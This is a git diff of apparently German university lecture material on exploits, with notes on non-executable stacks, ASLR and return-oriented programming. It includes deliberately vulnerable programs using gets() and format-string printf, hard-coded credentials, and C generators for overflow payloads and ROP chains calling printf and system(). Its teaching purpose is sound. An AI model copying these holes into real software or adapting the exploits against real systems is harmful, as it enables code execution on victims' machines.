diff --git a/20200629/bs-20200629.txt b/20200629/bs-20200629.txt new file mode 100644 index 0000000000000000000000000000000000000000..5383b09abf5db3606a9eb9101f21965f1d2e683b --- /dev/null +++ b/20200629/bs-20200629.txt @@ -0,0 +1,8 @@ +Exploits, 29.06.2020, 15:38:10 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Früher möglich: Programm in den Stack schreiben, dorthin springen. +Heute: Nicht-ausführbarer Stack, Address Space Layout Randomization (ASLR) +Return Oriented Programming erforderlich +genauer: return-to-libc; noch genauer: return-to-plt +Gezielt Winz-Funktionen anspringen, um Register zu setzen, +danach Programm- und Bibliotheksfunktionen anspringen. diff --git a/20200629/exploit-1.c b/20200629/exploit-1.c new file mode 100644 index 0000000000000000000000000000000000000000..a35dee9116d764073a7a6bebee1dffa4d67ed2e7 --- /dev/null +++ b/20200629/exploit-1.c @@ -0,0 +1,19 @@ +#include <unistd.h> +#include <stdint.h> + +int main (int argc, char **argv) +{ + uint64_t my_program_address = 0x7fffffffdfa0; + for (int i = 2; i < 0x2a; i++) + write (1, "a", 1); // zum Auffüllen, um die Rücksprung-Adresse + write (1, &my_program_address, 8); // überschreiben zu können + for (int i = 2; i < 34; i++) + write (1, "A", 1); + write (1, "\x48\x83\xec\x60", 4); // sub $0x60,%rsp hierhin erfolgt der + write (1, "\x48\x89\xe7", 3); // mov %rsp,%rdi "Rück-"Sprung + write (1, "\xb8\x00\x00\x00\x00", 5); // mov $0x0,%eax + write (1, "\xe8\x26\xfe\xff\xff", 5); // callq 0x4003e0 <printf@plt> + write (1, "\xeb\xfe", 2); // while (1); + write (1, "\n", 1); + return 0; +} diff --git a/20200629/exploit-1.txt b/20200629/exploit-1.txt new file mode 100644 index 0000000000000000000000000000000000000000..974e383df36c343c8121fe13c3bf5e5a43d934aa Binary files /dev/null and b/20200629/exploit-1.txt differ diff --git a/20200629/exploit-2.c b/20200629/exploit-2.c new file mode 100644 index 0000000000000000000000000000000000000000..ecaab1d7877cbaeefd9d620e7ab41686e5e93bef --- /dev/null +++ b/20200629/exploit-2.c @@ -0,0 +1,26 @@ +#include <stdlib.h> +#include <stdint.h> +#include <unistd.h> + +#define OVERFLOW 40 + +int main (int argc, char **argv) +{ + uint64_t mov_rsp_rdi = 0x555555555176; + uint64_t add_offset_to_rdi = 0x55555555517d; + uint64_t dummy = 0; + uint64_t printf_address = 0x7ffff7e24560; + uint64_t exit_address = 0x7ffff7e05ea0; + uint8_t overflow[OVERFLOW] = "loser"; + uint8_t payload[] = "I 0WN U!!1! " + " "; + write (1, overflow, sizeof (overflow)); + write (1, &mov_rsp_rdi, 8); + write (1, &add_offset_to_rdi, 8); + write (1, &printf_address, 8); + write (1, &exit_address, 8); + write (1, &dummy, 8); + write (1, payload, sizeof (payload)); + write (1, "\n", 1); + return 0; +} diff --git a/20200629/exploit-2.txt b/20200629/exploit-2.txt new file mode 100644 index 0000000000000000000000000000000000000000..53b16fc729c568ce104acce9171c8f8b82d001c2 Binary files /dev/null and b/20200629/exploit-2.txt differ diff --git a/20200629/exploit-3.c b/20200629/exploit-3.c new file mode 100644 index 0000000000000000000000000000000000000000..a8ddbd9c5ffc3b83ba3acba1d967969324860fbd --- /dev/null +++ b/20200629/exploit-3.c @@ -0,0 +1,25 @@ +#include <stdlib.h> +#include <stdint.h> +#include <unistd.h> + +#define OVERFLOW 40 + +int main (int argc, char **argv) +{ + uint64_t mov_rsp_rdi = 0x555555555176; + uint64_t add_offset_to_rdi = 0x55555555517d; + uint64_t dummy = 0; + uint64_t system_address = 0x7ffff7e109c0; + uint64_t exit_address = 0x7ffff7e05ea0; + uint8_t overflow[OVERFLOW] = "loser"; + uint8_t payload[] = "gimp ../common/os-layers.xcf.gz"; + write (1, overflow, sizeof (overflow)); + write (1, &mov_rsp_rdi, 8); + write (1, &add_offset_to_rdi, 8); + write (1, &system_address, 8); + write (1, &exit_address, 8); + write (1, &dummy, 8); + write (1, payload, sizeof (payload)); + write (1, "\n", 1); + return 0; +} diff --git a/20200629/exploit-3.txt b/20200629/exploit-3.txt new file mode 100644 index 0000000000000000000000000000000000000000..d53f1c805994e7b4e4bf9c35cb75aa493aadc79d Binary files /dev/null and b/20200629/exploit-3.txt differ diff --git a/20200629/server-0.c b/20200629/server-0.c new file mode 100644 index 0000000000000000000000000000000000000000..96f8b4df4c5a467aa5d2ec424434a6a33a6f6127 --- /dev/null +++ b/20200629/server-0.c @@ -0,0 +1,24 @@ +#include <stdio.h> +#include <string.h> +#include <unistd.h> + +int main (void) +{ + char name_buffer[100]; + char *pass_buffer; + char username[] = "peter"; + char password[] = "Hi!ph1sch"; + + printf ("Your name, please: "); + gets (name_buffer); + printf ("Hello, "); + printf (name_buffer); + printf ("!\n"); + + pass_buffer = getpass ("Your password, please: "); + if (strcmp (name_buffer, username) == 0 && strcmp (pass_buffer, password) == 0) + printf ("You have access.\n"); + else + printf ("Login incorrect.\n"); + return 0; +} diff --git a/20200629/server-1.c b/20200629/server-1.c new file mode 100644 index 0000000000000000000000000000000000000000..68f9eb57f5e277413a0206ed9af175033e9cda9d --- /dev/null +++ b/20200629/server-1.c @@ -0,0 +1,10 @@ +#include <stdio.h> + +int main (void) +{ + char buffer[20]; + printf ("Your name, please: "); + gets (buffer); + printf ("Hello, %s!\n", buffer); + return 0; +} diff --git a/20200629/server-2.c b/20200629/server-2.c new file mode 100644 index 0000000000000000000000000000000000000000..4aac725ae5c30412f0952a770d1c9d9f6c1f6895 --- /dev/null +++ b/20200629/server-2.c @@ -0,0 +1,33 @@ +#include <stdio.h> +#include <stdlib.h> + +void stuff (void) +{ + asm ("mov $0, %eax"); + asm ("add $0x28, %rsp"); + asm ("ret"); + asm ("nop"); + asm ("nop"); + asm ("nop"); + asm ("mov %rsp, %rdi"); + asm ("ret"); + asm ("nop"); + asm ("nop"); + asm ("nop"); + asm ("add $0x20, %rdi"); + asm ("ret"); + asm ("nop"); + asm ("nop"); + asm ("nop"); + system ("clear"); + exit (0); +} + +int main (void) +{ + char buffer[20]; + printf ("Your name, please: "); + gets (buffer); + printf ("Hello, %s!\n", buffer); + return 0; +} diff --git a/20200629/server-3.c b/20200629/server-3.c new file mode 100644 index 0000000000000000000000000000000000000000..11c3a7ff2bf4e1f27accebd7d9caddf6d90dfb66 --- /dev/null +++ b/20200629/server-3.c @@ -0,0 +1,33 @@ +#include <stdio.h> +#include <stdlib.h> + +void stuff (void) +{ + asm ("mov $0, %eax"); + asm ("add $0x28, %rsp"); + asm ("ret"); + asm ("nop"); + asm ("nop"); + asm ("nop"); + asm ("mov %rsp, %rdi"); + asm ("ret"); + asm ("nop"); + asm ("nop"); + asm ("nop"); + asm ("add $0x20, %rdi"); + asm ("ret"); + asm ("nop"); + asm ("nop"); + asm ("nop"); + system ("clear"); + exit (0); +} + +int main (void) +{ + char buffer[20]; + printf ("Your name, please: "); + fgets (buffer, 20, stdin); + printf ("Hello, %s!\n", buffer); + return 0; +}